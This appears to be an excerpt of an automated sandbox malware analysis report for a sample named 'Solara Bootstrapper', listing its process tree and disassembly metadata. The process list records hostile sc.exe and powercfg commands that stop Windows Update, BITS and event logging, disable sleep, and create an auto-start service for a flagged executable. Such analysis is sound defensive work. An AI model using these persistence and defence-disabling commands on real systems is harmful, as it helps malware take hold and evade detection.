                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:33
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:34
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:35
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:36
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:37
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:38
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:39
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:40
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:41
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:42
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:43
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:44
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:45
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:46
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\dialer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\dialer.exe
                                                Imagebase:0x7ff681550000
                                                File size:39'936 bytes
                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:47
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:48
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:49
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe delete "CKTJZLMO"
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:50
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:51
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:52
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:53
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\winlogon.exe
                                                Wow64 process (32bit):false
                                                Commandline:winlogon.exe
                                                Imagebase:0x7ff6156c0000
                                                File size:906'240 bytes
                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:54
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:55
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:56
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:57
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:58
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:59
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:60
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:61
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                Imagebase:0x7ff7fae50000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:62
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:63
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\dialer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\dialer.exe
                                                Imagebase:0x7ff681550000
                                                File size:39'936 bytes
                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:64
                                                Start time:10:09:17
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:66
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:67
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:68
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\lsass.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\lsass.exe
                                                Imagebase:0x7ff654c90000
                                                File size:59'456 bytes
                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:69
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:70
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:71
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                Imagebase:0x7ff6699d0000
                                                File size:5'471'744 bytes
                                                MD5 hash:FB6A3B436E9F9402937D95F755B62F91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 74%, ReversingLabs
                                                Has exited:true

                                                Target ID:72
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:73
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:74
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:75
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:76
                                                Start time:10:09:18
                                                Start date:07/01/2025
                                                Path:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                Imagebase:0x7ff6699d0000
                                                File size:5'471'744 bytes
                                                MD5 hash:FB6A3B436E9F9402937D95F755B62F91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:80.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:7.1%
                                                  Total number of Nodes:28
                                                  Total number of Limit Nodes:1

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_00401000 1 Function_00401410 2 Function_004014D1 4 Function_0040145B 2->4 3 Function_004013B4 4->1 4->3 5 Function_0040108C 4->5 5->0

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                  • String ID:
                                                  • API String ID: 3649950142-0
                                                  • Opcode ID: 3df386733fa54401bee5ad451dadeaeca0a1497b38bdaab36b895925076dfb24
                                                  • Instruction ID: 3d199445f7a175a1fb6d4f6e9c230187ca8284bd5def60f53120883d6dbf2659
                                                  • Opcode Fuzzy Hash: 3df386733fa54401bee5ad451dadeaeca0a1497b38bdaab36b895925076dfb24
                                                  • Instruction Fuzzy Hash: 54110CF5E00104AFCB40EBA9EC85F4A77ECAB58308F544479F809F3361E539E9488B65

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                  • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$p!@$q1$v1
                                                  • API String ID: 3236948872-410439292
                                                  • Opcode ID: 25a6402c87674cb448004a13c7e32e17225a32bb4e9f42c6cc14c45e1eeba6cb
                                                  • Instruction ID: 56ce7a2ae49fa8e5fe1f54009686eb25b361c80b550f3ea0890cdf401772d490
                                                  • Opcode Fuzzy Hash: 25a6402c87674cb448004a13c7e32e17225a32bb4e9f42c6cc14c45e1eeba6cb
                                                  • Instruction Fuzzy Hash: 338121F1E001149BDB14DBACDC41B9E77A9EB48309F04057DF109FB392E63CAA448B68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                                                  APIs
                                                  Strings
                                                  • :j60n8x(2vu00d[5(k=x&a--.[.)$<.8, xrefs: 0040106E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: :j60n8x(2vu00d[5(k=x&a--.[.)$<.8
                                                  • API String ID: 2803490479-829780682
                                                  • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                  • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                                                  • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                  • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 34 40145b-4014ae call 4013b4 call 40108c call 401410
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2096852486.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2096776503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2096867623.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2098974233.0000000000E78000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Solara Bootstrapper.jbxd
                                                  Similarity
                                                  • API ID: memset$ExecuteShellstrcmp
                                                  • String ID: D`:vD`:v$D`:vD`:v
                                                  • API String ID: 1389483452-3916433284
                                                  • Opcode ID: 839a5c45aa83c197ac975d5c1cc53e810cd998e554278d7b16ccc943bd22e27a
                                                  • Instruction ID: 76b88cef1d86ad1497cb396f4eac675b85de391fd72a1d1e72a6336c0f2a47e6
                                                  • Opcode Fuzzy Hash: 839a5c45aa83c197ac975d5c1cc53e810cd998e554278d7b16ccc943bd22e27a
                                                  • Instruction Fuzzy Hash: A7F09EB5A00208AFCB40DFE9D981D8A77F8AB4C308F5044A5F948E7351D634E9488F54

                                                  Execution Graph

                                                  Execution Coverage:5.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:3
                                                  Total number of Limit Nodes:0
                                                  execution_graph 20443 8157560 20444 81575a3 SetThreadToken 20443->20444 20445 81575d1 20444->20445

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 315 443b570-443b589 316 443b58b 315->316 317 443b58e-443b8d5 call 443ad9c 315->317 316->317
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2201566536.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4430000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: +Ygn^$Xgn^
                                                  • API String ID: 0-1196866723
                                                  • Opcode ID: cd2b56da3da662a2c0798788b06d1e5fa70005dd0638c6da4625b0c0c5ec78a6
                                                  • Instruction ID: d82ff4e74bf9d737b8e0412a205e3abbd02f18b988e32768f57ebf3cc0d3c6ec
                                                  • Opcode Fuzzy Hash: cd2b56da3da662a2c0798788b06d1e5fa70005dd0638c6da4625b0c0c5ec78a6
                                                  • Instruction Fuzzy Hash: 1691A671F006155BEB19DFB489105AEBBE3EF84B00B00892DD106AB764DF75AE098BC5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240484199.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6fe0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$J?l$J?l$J?l$J?l$J?l$J?l$r>l$r>l
                                                  • API String ID: 0-3153514658
                                                  • Opcode ID: bf123ed704feb86e04dea7533850ae2d3630b8c6d5d406e5c53e2e30363c226d
                                                  • Instruction ID: 4e9f1e334541c3587eeea4c8bfb30104622b2888c10b7119c37291a9ba966af2
                                                  • Opcode Fuzzy Hash: bf123ed704feb86e04dea7533850ae2d3630b8c6d5d406e5c53e2e30363c226d
                                                  • Instruction Fuzzy Hash: 20224731F04205DFDB549B6989416AABFEEEF89310F14847AD905CB252EF35CE41CBA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
